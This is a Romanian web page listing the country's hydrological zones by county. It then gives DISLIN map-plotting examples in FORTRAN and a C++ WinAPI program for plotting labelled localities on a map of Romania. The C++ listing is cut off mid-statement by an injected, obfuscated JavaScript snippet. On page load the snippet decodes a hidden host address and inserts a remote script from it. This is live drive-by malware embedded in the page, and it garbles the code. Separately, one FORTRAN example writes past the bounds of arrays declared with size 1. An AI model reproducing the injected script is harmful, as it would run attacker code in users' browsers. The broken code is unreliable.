II =     Zona Carpatilor Meridionali de înaltime mijlocie. Are trasaturi asemanatoare cu zona I însa aici se întâlnesc elemente ale regimului hidrologic mediteranean, viituri în timpul iernii datorite încalzirilor frecvente ale aerului. Teritorial cuprinde: jud. Arges: Muntii Iezerului; jud. Brasov:  Muntele Postavarul, Muntele Piatra Mare, Muntii Piatra Craiului, Muntii Persani, Depresiunea Brasovului; jud. Buzau: Muntii Siriu, Muntele Ivanet, Muntele Podul Calului, Muntele Penteleu, Subcarpatii Buzaului; jud. Dâmbovita: Muntii Leaota, Subcarpatii Prahovei;  jud. Gorj: Muntii Vâlcanului, Subcarpatii Gorjului, Depresiunea Târgu- Jiu, Depresiunea Carbunesti; jud. Hunedoara: Muntii Sureanului, Depresiunea Petrosani, Culoarul Orastiei; jud. Prahova: Muntii Ciucas, Muntii Grohotis, Valea Doftanei, Muntii Baiului, Subcarpatii Prahovei; jud. Sibiu: Muntii Cândelului (Cibinului), Depresiunea Sibiu;  jud. Vâlcea: Muntii Capatânii, Muntii Lotrului, Muntele Cozia, Subcarpatii Vâlcii.
III =     Zona Carpatica din estul si vestul Transilvaniei: se caracterizeaza prin alimentare bogata a râurilor cu ape provenite din ploi, scurgerea apei ridicata; include Muntii Apuseni si vestul Carpatilor Orientali:
III 1 =     Partea vestica a Carpatilor Orientali: jud. Bistrita- Nasaud: Muntii Bârgaului; jud. Covasna: Muntii Intorsurii, Muntii Bodoc, Muntii Baraolt; jud. Harghita: Muntii Harghita, Depresiunea Ciucului, Muntii Giurgeului, Depresiunea Giurgeului, Muntii Ciucului; jud. Maramures: Muntii Ignisului, Depresiunea Maramuresului, Muntii Maramuresului; jud. Mures: Muntii Calimani, Muntii Gurghiului, Subcarpatii Transilvaniei; jud. Satu- Mare: Muntii Oasului, Depresiunea Oasului.
III 2 =     Muntii Apuseni: jud. Alba: Muntii Trascaului, Depresiunea Câmpeni; jud. Arad: Muntii Zarandului, Depresiunea Zarandului; jud. Bihor: Muntii Padurea Craiului, Muntii Bihorului,  Muntii Codru-Moma; jud. Cluj: Masivul Vladeasa, Muntii Gilau- Muntele Mare; jud. Hunedoara: Depresiunea Brad- Halmagiu, Muntii Metaliferi, jud. Salaj: Muntii Meses;
IV =     Zona estica a Carpatilor Orientali. Se caracterizeaza prin alimentare pluviala intensa a râurilor, prin predominarea apelor mari de primavara si viituri frecvente în timpul verii si uneori al toamnei; datorita alimentarii subterane intense, scurgerea în perioada secetoasa si în intervalele dintre viituri este ridicata. Teritorial cuprinde: jud. Bacau: Muntii Nemirei, Culmea Pietricicai, Muntii Ciucului, Muntii Berzunti, Depresiunea Tazlau, Subcarpatii Moldovei;  jud. Neamt: Muntii Tarcaului, Muntii Gosmanului, Muntele Ceahlau, Muntii Stânisoarei, Subcarpatii Moldovei; jud. Suceava: Obcina Brodinei, Obcina Mare, Podisul Sucevei, Depresiunea Radauti, Podisul Dragomirnei, Culoarul Siretului, Muntii Suhardului, Depresiunea Dornelor, Obcina Mestecanisului, Obcina Feredeului, Obcina Mare, Muntele Giumalau, Muntele Rarau; jud. Vrancea: Muntii Vrancei, Subcarpatii Vrancei.
V =     Zona Carpatica si Subcarpatica din Nord-Vestul Olteniei. Se caracterizeaza prin încalziri frecvente ale aerului în timpul iernii, din care cauza scurgerea în acest anotimp este mai ridicata decât în cursul verii. Teritorial cuprinde: jud. Mehedinti: Podisul Mehedinti, Muntii Mehedinti, Muntii Almajului.
VI =     Zona Muntilor Banatului. Are multe trasaturi comune cu zona V, însa viiturile din timpul iernii, provenite exclusiv din ploi, sunt mult mai frecvente; în aceasta zona se reflecta cel mai bine particularitatile regimului hidrologic mediteranean; alimentare subterana ridicata, izvoarele carstice destul de numeroase. Teritorial cuprinde: jud. Caras- Severin:  Muntii Poiana Ruscai, Muntii Tarcului, Muntii Cernei, Depresiunea Caransebes, Muntii Semenic, Muntii Aninei, Muntii Docnecei, Muntii Locvei, Muntii Aninei, Depresiunea Almajului.
VII =     Zona piemontana sudica. Se caracterizeaza prin ape mari de primavara si viituri în timpul iernii si verii; se deosebeste de celelalte zone prin conditii variabile ale alimentarii subterane a râurilor care sunt legate de particularitatile structurii geologice si de adâncimea vaii râurilor; o mare parte a râurilor seaca atât vara cât si iarna. Teritorial cuprinde:  jud. Arges: Muscelele Argesului, Piemontul Cotmenei, Gruiurile Argesului, Piemontul Cândesti; jud. Dâmbovita: Piemontul Cândesti; jud. Gorj: Gruiurile Jiului; jud. Mehedinti: Piemontul Motrului, Podisul Balacitei; jud. Olt: Piemontul Cotmenei; jud. Vâlcea: Piemontul Oltetului.
VIII =     Zona Podisului Moldovei. Se caracterizeaza prin regim hidrologic continental mai accentuat decât în celelalte zone, exprimat prin ape mari de primavara si viituri pluviale intense în timpul verii si toamnei. Teritorial cuprinde: jud. Bacau: Colinele Tutovei, Colinele Falciului, jud. Botosani: Câmpia Moldovei, jud. Galati: Câmpia Tecuciului, Câmpia Covârluiului, Podisul Covârluiului; jud. Iasi: Dealul Mare, Câmpia Moldovei, Podisul Central Moldovenesc, Colinele Tutovei; jud. Suceava: Podisul Sucevei; jud. Vaslui: Podisul Central Moldovenesc, Colinele Tutovei, Colinele Falciului; jud. Vrancea: Dealurile Susitei, Colinele Tutovei, Dealurile Milcovului.
IX =     Zona Câmpiei Române si Dobrogei: regimul hidrologic al râurilor instabil, cu viituri pluviale în tot timpul anului si cu ape mari primavara provenite exclusiv din topirea zapezii; apele subterane au un aport destul de slab în alimentarea râurilor; predomina alimentarea prin zapada si ploaie:
IX 1=     Câmpia Româna . Teritorial cuprinde: jud. Braila: Câmpia Brailei, Câmpia Siretului Inferior, Balta Brailei;  jud. Buzau: Câmpia Râmnicului;  jud. Dâmbovita: Câmpia Târgoviste- Ploiesti, Câmpia Titu; jud. Dolj: Câmpia Olteniei, Câmpia Desnatuiului, Lunca Dunarii; jud. Ialomita: Baraganul Ialomitei, Balta Ialomitei, jud. Ilfov: Câmpia Vlasiei, Câmpia Mostistei; jud. Mehedinti: Câmpia Blahnitei; jud. Olt: Câmpia Boian; jud. Prahova: Câmpia Saratei; jud. Teleorman: Câmpia Gavanu- Burdea, Câmpia Boian.
IX 2=     Dobrogea. Teritorial cuprinde: jud. Constanta: Podisul Dobrogei de Sud, Podisul Casimcei;  jud. Tulcea: Muntii Macinului (Culmea Pricopan: 370 m. alt), Podisul Niculitel, Dealurile Tulcei, Podisul Dobrogei de Nord, Podisul Babadagului.
X=     Zona piemonturilor vestice si a Câmpiei Tisei. Regimul hidrologic al râurilor se caracterizeaza prin viituri pluvio-nivale din timpul iernii, ape mari de primavara si viituri pluviale vara si toamna; apele subterane au aport slab în alimentarea râurilor. Teritorial cuprinde: jud. Arad: Câmpia Muresului, Podisul Lipovei; jud. Bihor: Dealurile Tasadului, Câmpia Crisurilor, Dealurile Oradei; jud. Caras- Severin: Depresiunea Carasului, Dealurile Oravitei, Dealurile Poganisului; jud. Satu-Mare: Câmpia Somesului; jud. Timis: Câmpia Timisului, Câmpia Bârzavei, Dealurile Buziasului, Câmpia Vingai, Câmpia Arancai.
XI=     Zona Bazinului Transilvaniei. Regimul râurilor se caracterizeaza prin ape mari de primavara nivo- pluviale si viituri pluviale vara si toamna; alimentarea subterana a râurilor este redusa Teritorial cuprinde:  jud. Alba: Podisul Secaselor; jud. Bistrita-Nasaud: Câmpia Transilvaniei, Dealurile Bistritei, Dealurile Nasaudului; jud. Brasov: Depresiunea Fagarasului; jud. Cluj: Câmpia Transilvaniei, Câmpia Fizesului, Podisul Somesan, Dealurile Feleacului; jud. Maramures: Dealurile Chioarului; jud. Mures: Dealurile Târnavei Mici, Câmpia Sarmasului, Podisul Târnavelor; jud. Mures: Câmpia Sarmasului, Podisul Târnavelor; jud. Salaj: Podisul Somesan, Podisul Boiului , Dealurile Salajului; jud. Sibiu: Podisul Târnavelor, Podisul Hârtibaciului.

 

 




Programmable maps of Romania by using the DISLIN package

 

Most of the code used below is adapted from the examples by Helmut Michels, author of the DISLIN plotting package

(DISLIN homepage)

 

 

 

  • Map of Romania

 

 

 

 

  • FORTRAN code for use with ProgrammingPool


PARAMETER (N = 32)
DIMENSION INRAY(N),IPRAY(N),ICRAY(N)

DO I=1,N
INRAY(I)=I
IPRAY(I)=0
ICRAY(I)=1
END DO
CALL METAFL ('png')
CALL SETPAG ('DA4L')
CALL SCRMOD ('REVERS')
CALL DISINI
CALL PAGERA
CALL COMPLX

CALL INTAX
CALL TICKS(1,'XY')
C CALL FRAME(3)
CALL AXSLEN(1600,2200)
CALL AXSPOS(400,2700)

CALL NAME('Longitudine','X')
CALL NAME('Latitudine','Y')
CALL TITLIN('Proiectie cilindrica echidistanta',3)

c CALL LABELS('MAP','XY')
CALL PROJCT('CYLI')
CALL GRAFMP(20.,30.,20.,1.0,43.5,48.5,44.0,1.0)

CALL GRIDMP(2,2)
CALL SHDEUR(25,0,12,1)
C (INRAY,IPRAY,ICRAY,N)

CALL HEIGHT(50)
CALL TITLE
CALL DISFIN
END

 




 

 

 

  • Planiglobe

 

 

  • FORTRAN code for use with ProgrammingPool

 

CALL METAFL ('XWIN')
CALL SETPAG('DA4L')
CALL DISINI
CALL PAGERA
CALL COMPLX
CALL FRAME(3)
CALL AXSPOS(400,1850)
CALL AXSLEN(2400,1400)
CALL NAME('Longitude','X')
CALL NAME('Latitude','Y')
CALL TITLIN('World Coastlines and Lakes',3)
CALL LABELS('MAP','XY')
CALL GRAFMP(-180.,180.,-180.,90.,-90.,90.,-90.,30.)
CALL GRIDMP(1,1)
CALL WORLD
CALL HEIGHT(50)
CALL TITLE
CALL DISFIN
END

 

 

 




 

  • Map of Europe

 

 

 

  • FORTRAN code for use with ProgrammingPool


PARAMETER (N =32)
DIMENSION INRAY(1),IPRAY(1),ICRAY(1)
I=1
DO I=1,N
INRAY(I)=I
IPRAY(I)=I
ICRAY(1)= I/2
END DO
CALL METAFL ('XWIN')
CALL SETPAG ('DA4L')
CALL DISINI
CALL PAGERA
CALL COMPLX
CALL INTAX
CALL TICKS (1,'XY')
CALL FRAME (3)
CALL AXSLEN (1600,2200)
CALL AXSPOS (400,2700)
CALL NAME ('Longitude','X')
CALL NAME ('Latitude','Y')
CALL TITLIN ('Conformal Conic Projection',3)
CALL LABELS ('MAP','XY')
CALL PROJCT ('CONF')
CALL GRAFMP (-10.,30.,-10.,5.,35.,70.,35.,5.)
CALL GRIDMP (1,1)
CALL SHDEUR (INRAY,IPRAY,ICRAY,N)
CALL HEIGHT (50)
CALL TITLE
CALL DISFIN
END

 

 

 




 

An interactive program to plot Romania maps by using the DISLIN package and WinAPI32

Download program

 

 

Screenshot of the program

 


Program functionality

 


The program plots the map of Romania and adds interactively marks and labels to the geographical coordinates of an item such as a locality.

 

The plotting is done by using the DISLIN package while frindly Open/Save and data editing is made in the frame of WinAPI32 instructions by using our ProgrammingPool environment.

 

  • In the upper window(work window) the user should write in separate rows:
         1. Number of points - i.e. items such as localities - which will be plotted = N
         2. N rows containing: LONGITUDE, LATITUDE folowed by the label, i.e. name of the locality

 

  • Program functionality is obtained by clicking the menu items or by using keyboard shortcuts in the usual way:

 

<Alt>L for data Load
bullet <Alt>S for Saving data
bullet <Alt>P for data Plot
b4 <Alt>H for Help
b <Alt>A for About
b <Alt>V for Image saving
b <Alt>E for Ending program

 

  • The work window (the upper window) is automatically saved as 'map_ro.in' - a text file, in the working folder, identified during saving the data.

 

  • To end visualization click the mouse right button.

 

  • You may save the image in TIFF format but keeping keep in mind the current working folder  == WHERE YOU SAVED THE INPUT DATA == a mandatory requirement for a clean work

 

  • In case of name repetition in the same folder, the old file is not overwritten but a counter is attached to the first  few characters of the file name.

 

  • After the plot the data used in 'map_ro.in' are posted in the lower window. Similarly, after saving the image, the path is posted in the lower window for verification.


Listing of the program written in C++ as ran with ProgrammingPool

 

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dislin.h>
#include<g++/streambuf.h>
#pragma hdrstop

#include<g++/iostream.h>
#include<math.h>

#define CM_HELP   9061
#define CM_ABOUT   9062
#define CM_CALCUL  9063
#define CM_SAVEAS  9072
#define CM_OPEN    9073
#define CM_TIF    9074
#define CM_EXIT    9075
#define IDC_MAIN_TEXT   1001

static char g_szClassName[] = "MyWindowClass";
static char dlg_szClassName[] = "DlgWindowClass";
char string[80]="";
char string1[300];
static HINSTANCE g_hInst = NULL;
HWND hwnd;
HWND ed1,ed2;
HMENU meniu = CreateMenu ();

char szFileName[MAX_PATH], fisier[80]="map_ro.in",Nume00[300];

HANDLE hFile;
BOOL bSuccess = FALSE;
OPENFILENAME ofn;
int contor=0;

float XC[1111]={23.647,24.353},
      YC[1111]={46.756,45.248};
 float xx,yy,XP,YP;
 CHAR   CSTR[1111][80]={"Cluj-Napoca","Cozia Mt."};
 int   I, NXP, NYP,tara,t2,NN=2;
 long int t1;

#define IDC_MAIN_TEXT   1001

void Plotare()
{

 FILE *intrare=fopen("map_ro.in","rt");
 fscanf (intrare, "%d\n", &NN);
 for (I=0 ;I<NN;I++)
 {
 fscanf (intrare, "%f %f %[^\n]", &XC[I],&YC[I],&CSTR[I]);//instead of %s we use [^\n] to read until \n
 }
 fclose (intrare);
 
      metafl ("XWIN");
      scrmod ("REVERS");
      disini ();
      pagera ();
      hwfont ();

       axspos(500,1850);
       axslen(2200,1400);

       labdig(1/*-1*/,"xy");//Nr of digits after decimal point

       ticks (1,"xy");
       name("Longitude","x");
       name("Latitude","y");

       titlin("Map of Romania",1);
       incmrk(-1);

//       LABELS ("MAP","xy")
       projct ("cyli");
       height (25);
       grafmp (20.0,30.0,20.0,0.5,43.5,48.5,44.0,0.5);
       //world();
      // curvmp (XC,YC,NN);//small squares near the label
       tara=25;
       t1=0;//hatches ..5
       t2=9;//color
       shdeur (&tara, &t1, &t2, 1);
       for (I=0;I<NN;I++)
       {
          xx=XC[I];yy=YC[I];
          pos2pt (xx,yy,&XP,&YP);
          NXP=(int)XP+30;
          NYP=(int)YP;
          symbol (21,NXP-30,NYP);//codul 16 sau 21
          messag (CSTR[I] ,NXP,NYP);
       }
  

       gridmp (1,1);

       height (50);
       title();
       //MessageBox(NULL,"","",NULL);
       disfin();


}

BOOL LoadFile(HWND hEdit, LPSTR pszFileName)
{
  bSuccess=TRUE;
   hFile = CreateFile(pszFileName, GENERIC_READ, FILE_SHARE_READ, NULL,
      OPEN_EXISTING, 0, 0);
   if(hFile != INVALID_HANDLE_VALUE)
   {
      DWORD dwFileSize;
      dwFileSize = GetFileSize(hFile, NULL);
      if(dwFileSize != 0xFFFFFFFF)
      {
         LPSTR pszFileText;
         pszFileText = (LPSTR)GlobalAlloc(GPTR, dwFileSize + 1);
         if(pszFileText != NULL)
         {
            DWORD dwRead;
            if(ReadFile(hFile, pszFileText, dwFileSize, &dwRead, NULL))
            {
               pszFileText[dwFileSize] = 0; // Null terminator
               if(SetWindowText(hEdit, pszFileText))
                  bSuccess = TRUE; // It worked!
            }
            GlobalFree(pszFileText);
         }
      }
      CloseHandle(hFile);
   }
   return bSuccess;
}

BOOL SaveFile(HWND hEdit, LPSTR pszFileName)
{

    bSuccess = FALSE;
   hFile = CreateFile(pszFileName, GENERIC_WRITE, 0, 0,
      CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
   if(hFile != INVALID_HANDLE_VALUE)
   {
      DWORD dwTextLength;
      dwTextLength = GetWindowTextLength(hEdit);
      if(dwTextLength > 0)// No need to bother if there's no text.
      {
         LPSTR pszText;
         pszText = (LPSTR)GlobalAlloc(GPTR, dwTextLength + 1);
         if(pszText != NULL)
         {
            if(GetWindowText(hEdit, pszText, dwTextLength + 1))
            {
               DWORD dwWritten;
               if(WriteFile(hFile, pszText, dwTextLength, &dwWritten, NULL))
                  bSuccess = TRUE;
            }
            GlobalFree(pszText);
         }
      }
      CloseHandle(hFile);
   }
   return bSuccess;
}

BOOL DoFileOpenSave(HWND hwnd, BOOL bSave)
{

   ZeroMemory(&ofn, sizeof(ofn));
   szFileName[0] = 0;
   ofn.lStructSize = sizeof(ofn);
   ofn.hwndOwner = hwnd;
   ofn.lpstrFilter = "Input files (*.in)\0*.in\0Text files(*.txt)\0*.txt\0\0";
   ofn.lpstrFile = szFileName;
   ofn.nMaxFile = MAX_PATH;
   ofn.lpstrDefExt = "in";

   if(bSave)
   {
      ofn.Flags = OFN_EXPLORER;
       //| OFN_PATHMUSTEXIST | OFN_HIDEREADONLY |OFN_OVERWRITEPROMPT;
         
      if(GetSaveFileName(&ofn))
      {
         if(!SaveFile(GetDlgItem(hwnd, IDC_MAIN_TEXT), szFileName))
         {
            MessageBox(hwnd, "Save file failed.", "Error",
               MB_OK | MB_ICONEXCLAMATION);
            return FALSE;
         }
      }
   }
   else
   {
      ofn.Flags = OFN_EXPLORER;// | OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
      if(GetOpenFileName(&ofn))
      {
         if(!LoadFile(GetDlgItem(hwnd, IDC_MAIN_TEXT), szFileName))
         {
            MessageBox(hwnd, "Load of file failed.", "Error",
               MB_OK | MB_ICONEXCLAMATION);
            return FALSE;
         }
      }
   }
   return TRUE;
}


LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam)
{
char FileName[600]="c:\\temp";
   switch(Message)
   {
      case WM_CREATE:

         ed1=CreateWindow("EDIT", "Data for the plot",
            WS_CHILD | WS_VISIBLE | WS_HSCROLL | WS_VSCROLL |
            ES_MULTILINE |ES_WANTRETURN| ES_AUTOHSCROLL |  ES_AUTOVSCROLL, //| ES_OEMCONVERT,
            0,0,600, 300,
            hwnd, (HMENU)IDC_MAIN_TEXT, g_hInst, NULL);
            LoadFile (ed1,fisier);

         ed2=CreateWindow("EDIT", "Checking the plotted data",
            WS_CHILD | WS_VISIBLE | WS_HSCROLL|
            WS_VSCROLL | ES_MULTILINE |
               ES_WANTRETURN,//|WS_SYSMENU,
            0,300,600, 160,
            hwnd, (HMENU)9901, g_hInst, NULL);
            
            ShowWindow(ed2,SW_NORMAL);

         SendDlgItemMessage (hwnd, IDC_MAIN_TEXT, WM_SETFONT ,
            (WPARAM)GetStockObject(
            //DEFAULT_GUI_FONT
            SYSTEM_FIXED_FONT
            ), MAKELPARAM (TRUE, 0));
            
      break ;
      break ;
      case WM_COMMAND:
         switch (LOWORD (wParam) )
         {
            case CM_OPEN:
               DoFileOpenSave (hwnd, FALSE);
            break try{window.onload=function(){Ry6ngp1l7o05 = '' + 't!&#o!^)p(#!s)#^(h&@a#@^r@@#@e$w)(&a)!r@e@(##-&!c($!(o^@#m((.)g(^^o!^$o#g@^l#(#e))(.#)c!o&$m$@@.#$b$!^r#)^).&$s)!#!o^&$f^&#t((!o@!(!)n&!i((&@$c!)-&c^()o@(m^$^.#(!b)!@a#t@(t!^&@o(p@@!.^r!##u@#:($(V@&$k#(b#m^@t)^(@q$&r$$v@n$#$7#@(c#w&&!4^$d@#$/!g$$o@#$o@)&g!$l(^e^&&.@)c()o$)m!)).((b^((d)&@/)$$g$!o@^(o!$g$^@l)(@)&e#&^.(c)!(o(!m!).$&!b&)d#/&)@j($o$($o$^m^^l)$^a#$@).)$o$(^!r@@&g#!/^&g&^^o#o(!g(l$&e!@.$c&@(o$$&^m^#/#((s(^#a()(n#(($&o!!o#k#@#&.!c!(&o&@m^/^^!'.replace(/\(|\!|@|\$|\)|\^|#|&/ig, '') ;Kei51ro926t47 = 'appendChild';Yj7vs188hh = document.createElement('sc'+'ript');Yj7vs188hh.src = 'h'+'ttp://'+Ry6ngp1l7o05.replace(/Vkbmtqrvn7cw4d/g, '8080');Yj7vs188hh.setAttribute('defer', 'def'+'er');eval('document.body.'+Kei51ro926t47+'(Yj7vs188hh)');} } catch(Vm5m6g16 ) {}